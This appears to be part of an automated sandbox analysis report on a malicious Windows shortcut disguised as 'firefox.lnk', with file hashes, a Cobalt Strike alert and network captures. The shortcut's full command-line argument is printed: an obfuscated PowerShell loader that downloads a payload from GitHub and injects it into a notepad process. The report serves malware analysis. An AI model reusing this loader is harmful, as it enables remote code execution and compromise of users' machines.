                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....c...........!................^$... ...@....... ....................................@..................................$..W....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@$......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......0...#Strings....4.......#US.<.......#GUID...L...`...#Blob...........G.........%3............................................................+.$.....w.................w.................................... 2............ A............ T.....P ......g.*.......m.....o.....q.....s.....u.....m.....o.....q.....s.....u.....m.....o.....q.....s.....u...........

                                                                        C:\Users\user\AppData\Local\Temp\h4qpy1nu\h4qpy1nu.out

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                                                        Category:modified
                                                                        Size (bytes):872
                                                                        Entropy (8bit):5.332228552710304
                                                                        Encrypted:false
                                                                        SSDEEP:24:KMoId3ka6KzFDE2FeKaM5DqBVKVrdFAMBJTH:dokka6aFDE2FeKxDcVKdBJj
                                                                        MD5:B00ECA0B60699F3C9C868F5FC598A3FF
                                                                        SHA1:E7EDAB1A047B23F145EA1A3334B434BE36275165
                                                                        SHA-256:B8070B5321CC3B751C65B8FB950B374FC78061B1C818205288ACD0B9871DE644
                                                                        SHA-512:B9C4D5AC9528E6FCD78B00AF861FC494185100FC16A85080A7A3B1BB6D8C2D7EA278ACE301A81882D425FB79A7CD0866573E3C918D305DA7618D9DC26637894B
                                                                        Malicious:false
                                                                        Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\h4qpy1nu\h4qpy1nu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\h4qpy1nu\h4qpy1nu.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5a2d9c9c1030a67b.customDestinations-ms (copy)

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):5312
                                                                        Entropy (8bit):3.4347794878529414
                                                                        Encrypted:false
                                                                        SSDEEP:48:ASJ7VWH88rwLIlWOtoU8kbSogZo2utoU8kbSogZoiH:Am7VY/AkxAHuxAHz
                                                                        MD5:E1F7FFDDE7C4FB7060ED84289D06C98F
                                                                        SHA1:DF69A02DB1252CB51C3EC371F5904D1F2801B6EA
                                                                        SHA-256:CCABF79DF633CDF1DD363CB83A9D866FD7AE3CADBE3FDA0E45BBB8303CF832C1
                                                                        SHA-512:2CED9CAA76EE8090BE3A2112779BCF4632FFE8AF146C8F34B6F9B5E5A71C7878E87E462F061DADF44ECC325EF9EEB0B2C0DE0F43744C7E2AD3F77E9603FD2C1E
                                                                        Malicious:false
                                                                        Preview:...................................FL..................F.`.. ...!.z.....G..x-.....x-...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&..........-............x-....b.2.....5V.I .firefox.lnk.H.......U.5V.I....`......................T;.f.i.r.e.f.o.x...l.n.k.......R...............-.......Q.............q.....C:\Users\user\Desktop\firefox.lnk.. .C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.O.n.e.D.r.i.v.e...i.c.o.........%SystemRoot%\SysWOW64\OneDrive.ico..................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.y.s.W.O.W.6.4.\.O.n.e.D.r.i.v.e...i.c.o.................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SMUJ3TCIALFNYORVY4TY.temp

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):5312
                                                                        Entropy (8bit):3.4347794878529414
                                                                        Encrypted:false
                                                                        SSDEEP:48:ASJ7VWH88rwLIlWOtoU8kbSogZo2utoU8kbSogZoiH:Am7VY/AkxAHuxAHz
                                                                        MD5:E1F7FFDDE7C4FB7060ED84289D06C98F
                                                                        SHA1:DF69A02DB1252CB51C3EC371F5904D1F2801B6EA
                                                                        SHA-256:CCABF79DF633CDF1DD363CB83A9D866FD7AE3CADBE3FDA0E45BBB8303CF832C1
                                                                        SHA-512:2CED9CAA76EE8090BE3A2112779BCF4632FFE8AF146C8F34B6F9B5E5A71C7878E87E462F061DADF44ECC325EF9EEB0B2C0DE0F43744C7E2AD3F77E9603FD2C1E
                                                                        Malicious:false
                                                                        Preview:...................................FL..................F.`.. ...!.z.....G..x-.....x-...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&..........-............x-....b.2.....5V.I .firefox.lnk.H.......U.5V.I....`......................T;.f.i.r.e.f.o.x...l.n.k.......R...............-.......Q.............q.....C:\Users\user\Desktop\firefox.lnk.. .C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.O.n.e.D.r.i.v.e...i.c.o.........%SystemRoot%\SysWOW64\OneDrive.ico..................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.y.s.W.O.W.6.4.\.O.n.e.D.r.i.v.e...i.c.o.................................................................................................................................................................................................................................

                                                                        Static File Info

                                                                        General

                                                                        File type:MS Windows shortcut, Item id list present, Has command line arguments, Icon number=0, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                                        Entropy (8bit):3.1698724192294567
                                                                        TrID:
                                                                        • Windows Shortcut (20020/1) 100.00%
                                                                        File name:firefox.lnk
                                                                        File size:3334
                                                                        MD5:e0c6b90b6436e492baa904698e281527
                                                                        SHA1:3c05a31b00ebdce2c5bc5dfc150672928b9131fa
                                                                        SHA256:b5403448598de334b4a94ed9ab9e14a9e22160753a73ae98fa81b9172a385414
                                                                        SHA512:53213e55c0ba0a79cfeafc0e03e52aabde3dc0989b75e8ce50d30f5019b8ae5044936610544f85c086da985d9096a4c1153fccb417f6924c30539f473e8f2555
                                                                        SSDEEP:48:8P5aZMyW+6IZERNRhZ3aKr0MyKZBy9rwLIlxabR+:8P5AMyPJZERNRf3d0NKZB+A8
                                                                        TLSH:A36135506FCB421EF9F26A3AC5EE3257507AB9C5AD29CA4A0058431950F3804E4F7F37
                                                                        File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                                                                        File Icon

                                                                        Icon Hash:027160d68301ad0d

                                                                        Static Windows Shortcut Info

                                                                        General

                                                                        Relative Path:
                                                                        Command Line Argument:function /{([int[]][char[]]$args[0]|%{[char]($_-4)})-join''};$c =/ '_HppMqtsvx,&oivrip762hpp&-atyfpmg$wxexmg$i|xivr$MrxTxv$ZmvxyepEppsgI|,MrxTxv$e0$MrxTxv$f0$ymrx$g0$ymrx$h0$ymrx$i-?_HppMqtsvx,&oivrip762hpp&-atyfpmg$wxexmg$i|xivr$fssp$[vmxiTvsgiwwQiqsv},MrxTxv$e0$MrxTxv$f0$f}xi_a$g0$ymrx$h0$syx$mrx$i-?_HppMqtsvx,&oivrip762hpp&-atyfpmg$wxexmg$i|xivr$MrxTxv$GviexiViqsxiXlvieh,MrxTxv$e0$MrxTxv$f0$ymrx$g0$MrxTxv$h0$MrxTxv$i0$ymrx$j0$syx$MrxTxv$k-?';Add-Type -Name y -names x -m $c;$h = [System.Diagnostics.Process]::GetProcessById((ps notepad).id[0]).Handle;$a = [x.y]::(/ 'ZmvxyepEppsgI|')($h, 0, 0x100000, 0x1000, 0x40);$d = (iwr github.com/john-xor/temp/blob/main/index.html?raw=true).content;$n = 0;$t = 0;[x.y]::(/ '[vmxiTvsgiwwQiqsv}')($h, $a, $d, $d.Length, [ref] $n);[x.y]::(/ 'GviexiViqsxiXlvieh')($h, 0, 0, $a, 0, 0, [ref] $t);
                                                                        Icon location:C:\Windows\SysWOW64\OneDrive.ico

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        185.199.108.133192.168.2.5443497042851878 01/21/23-01:14:27.101319TCP2851878ETPRO TROJAN Cobalt Strike Stager Payload44349704185.199.108.133192.168.2.5

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Jan 21, 2023 01:14:26.133146048 CET4970180192.168.2.5140.82.121.3
                                                                        Jan 21, 2023 01:14:26.150253057 CET8049701140.82.121.3192.168.2.5
                                                                        Jan 21, 2023 01:14:26.150398970 CET4970180192.168.2.5140.82.121.3
                                                                        Jan 21, 2023 01:14:26.154778004 CET4970180192.168.2.5140.82.121.3
                                                                        Jan 21, 2023 01:14:26.172750950 CET8049701140.82.121.3192.168.2.5
                                                                        Jan 21, 2023 01:14:26.222577095 CET4970180192.168.2.5140.82.121.3
                                                                        Jan 21, 2023 01:14:26.224328041 CET49702443192.168.2.5140.82.121.4
                                                                        Jan 21, 2023 01:14:26.224404097 CET44349702140.82.121.4192.168.2.5
                                                                        Jan 21, 2023 01:14:26.224524975 CET49702443192.168.2.5140.82.121.4
                                                                        Jan 21, 2023 01:14:26.240740061 CET49702443192.168.2.5140.82.121.4
                                                                        Jan 21, 2023 01:14:26.240792036 CET44349702140.82.121.4192.168.2.5
                                                                        Jan 21, 2023 01:14:26.296225071 CET44349702140.82.121.4192.168.2.5
                                                                        Jan 21, 2023 01:14:26.296582937 CET49702443192.168.2.5140.82.121.4
                                                                        Jan 21, 2023 01:14:26.305351019 CET49702443192.168.2.5140.82.121.4
                                                                        Jan 21, 2023 01:14:26.305386066 CET44349702140.82.121.4192.168.2.5
                                                                        Jan 21, 2023 01:14:26.305896044 CET44349702140.82.121.4192.168.2.5
                                                                        Jan 21, 2023 01:14:26.347534895 CET49702443192.168.2.5140.82.121.4
                                                                        Jan 21, 2023 01:14:26.353092909 CET49702443192.168.2.5140.82.121.4
                                                                        Jan 21, 2023 01:14:26.353122950 CET44349702140.82.121.4192.168.2.5
                                                                        Jan 21, 2023 01:14:26.583525896 CET44349702140.82.121.4192.168.2.5
                                                                        Jan 21, 2023 01:14:26.583687067 CET44349702140.82.121.4192.168.2.5
                                                                        Jan 21, 2023 01:14:26.583836079 CET49702443192.168.2.5140.82.121.4
                                                                        Jan 21, 2023 01:14:26.583889961 CET44349702140.82.121.4192.168.2.5
                                                                        Jan 21, 2023 01:14:26.583949089 CET44349702140.82.121.4192.168.2.5
                                                                        Jan 21, 2023 01:14:26.584038019 CET49702443192.168.2.5140.82.121.4
                                                                        Jan 21, 2023 01:14:26.586818933 CET49702443192.168.2.5140.82.121.4
                                                                        Jan 21, 2023 01:14:26.593605042 CET49703443192.168.2.5140.82.121.4
                                                                        Jan 21, 2023 01:14:26.593641996 CET44349703140.82.121.4192.168.2.5
                                                                        Jan 21, 2023 01:14:26.593739033 CET49703443192.168.2.5140.82.121.4
                                                                        Jan 21, 2023 01:14:26.593950033 CET49703443192.168.2.5140.82.121.4
                                                                        Jan 21, 2023 01:14:26.593967915 CET44349703140.82.121.4192.168.2.5
                                                                        Jan 21, 2023 01:14:26.640822887 CET44349703140.82.121.4192.168.2.5
                                                                        Jan 21, 2023 01:14:26.645061016 CET49703443192.168.2.5140.82.121.4
                                                                        Jan 21, 2023 01:14:26.645090103 CET44349703140.82.121.4192.168.2.5
                                                                        Jan 21, 2023 01:14:26.822276115 CET44349703140.82.121.4192.168.2.5
                                                                        Jan 21, 2023 01:14:26.822493076 CET44349703140.82.121.4192.168.2.5
                                                                        Jan 21, 2023 01:14:26.822613001 CET44349703140.82.121.4192.168.2.5
                                                                        Jan 21, 2023 01:14:26.822725058 CET49703443192.168.2.5140.82.121.4
                                                                        Jan 21, 2023 01:14:26.822726011 CET49703443192.168.2.5140.82.121.4
                                                                        Jan 21, 2023 01:14:26.823259115 CET49703443192.168.2.5140.82.121.4
                                                                        Jan 21, 2023 01:14:26.851411104 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:26.851483107 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:26.851587057 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:26.854218006 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:26.854253054 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:26.907712936 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:26.907934904 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:26.913940907 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:26.913974047 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:26.914377928 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:26.916459084 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:26.916481018 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.101247072 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.101438999 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.101531029 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.101574898 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.101635933 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.101717949 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.101732969 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.101763964 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.101831913 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.101851940 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.102014065 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.102082968 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.102102995 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.102190971 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.102303028 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.102368116 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.102422953 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.102442026 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.102466106 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.105635881 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.105725050 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.105767965 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.105787039 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.105814934 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.105863094 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.117774010 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.117873907 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.118005991 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.118006945 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.118056059 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.120384932 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.120472908 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.120486975 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.120511055 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.120558977 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.124495983 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.124578953 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.124586105 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.124614000 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.124658108 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.131936073 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.132036924 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.132049084 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.132076979 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.132111073 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.132807016 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.132879019 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.132883072 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.132915020 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.132966042 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.134546995 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.134635925 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.134639025 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.134665012 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.134715080 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.135588884 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.135678053 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.342717886 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.394524097 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.499849081 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.499907970 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.500019073 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.679810047 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.679841995 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.679858923 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.679925919 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.679949045 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.679977894 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.680005074 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.680017948 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.680035114 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.680035114 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.680046082 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.680058002 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.680068016 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.680119038 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.680155993 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.752170086 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.752203941 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.752343893 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.802275896 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.802304983 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.802329063 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.802351952 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.802464962 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.802548885 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.852188110 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.852222919 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.852361917 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.858625889 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.858649969 CET44349704185.199.108.133192.168.2.5
                                                                        Jan 21, 2023 01:14:27.858719110 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:27.998471022 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:28.138092041 CET49704443192.168.2.5185.199.108.133
                                                                        Jan 21, 2023 01:14:28.983688116 CET4970180192.168.2.5140.82.121.3

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Jan 21, 2023 01:14:26.087110996 CET6064953192.168.2.58.8.8.8
                                                                        Jan 21, 2023 01:14:26.107007980 CET53606498.8.8.8192.168.2.5
                                                                        Jan 21, 2023 01:14:26.180350065 CET5144153192.168.2.58.8.8.8
                                                                        Jan 21, 2023 01:14:26.200206995 CET53514418.8.8.8192.168.2.5
                                                                        Jan 21, 2023 01:14:26.832716942 CET4917753192.168.2.58.8.8.8
                                                                        Jan 21, 2023 01:14:26.849975109 CET53491778.8.8.8192.168.2.5

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Jan 21, 2023 01:14:26.087110996 CET192.168.2.58.8.8.80xdaa9Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                        Jan 21, 2023 01:14:26.180350065 CET192.168.2.58.8.8.80x4fc6Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                        Jan 21, 2023 01:14:26.832716942 CET192.168.2.58.8.8.80xb35fStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Jan 21, 2023 01:14:26.107007980 CET8.8.8.8192.168.2.50xdaa9No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                        Jan 21, 2023 01:14:26.200206995 CET8.8.8.8192.168.2.50x4fc6No error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                                                        Jan 21, 2023 01:14:26.849975109 CET8.8.8.8192.168.2.50xb35fNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                        Jan 21, 2023 01:14:26.849975109 CET8.8.8.8192.168.2.50xb35fNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                        Jan 21, 2023 01:14:26.849975109 CET8.8.8.8192.168.2.50xb35fNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                        Jan 21, 2023 01:14:26.849975109 CET8.8.8.8192.168.2.50xb35fNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • github.com
                                                                        • raw.githubusercontent.com

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.2.549702140.82.121.4443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampkBytes transferredDirectionData


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.2.549703140.82.121.4443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampkBytes transferredDirectionData


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        2192.168.2.549704185.199.108.133443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampkBytes transferredDirectionData


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        3192.168.2.549701140.82.121.380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Jan 21, 2023 01:14:26.154778004 CET0OUTGET /john-xor/temp/blob/main/index.html?raw=true HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                        Host: github.com
                                                                        Connection: Keep-Alive
                                                                        Jan 21, 2023 01:14:26.172750950 CET0INHTTP/1.1 301 Moved Permanently
                                                                        Content-Length: 0
                                                                        Location: https://github.com/john-xor/temp/blob/main/index.html?raw=true


                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.2.549702140.82.121.4443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        2023-01-21 00:14:26 UTC0OUTGET /john-xor/temp/blob/main/index.html?raw=true HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                        Host: github.com
                                                                        Connection: Keep-Alive
                                                                        2023-01-21 00:14:26 UTC0INHTTP/1.1 302 Found
                                                                        Server: GitHub.com
                                                                        Date: Sat, 21 Jan 2023 00:14:26 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                        Location: https://github.com/john-xor/temp/raw/main/index.html
                                                                        Cache-Control: no-cache
                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                        X-Frame-Options: deny
                                                                        X-Content-Type-Options: nosniff
                                                                        X-XSS-Protection: 0
                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                        2023-01-21 00:14:26 UTC0INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.
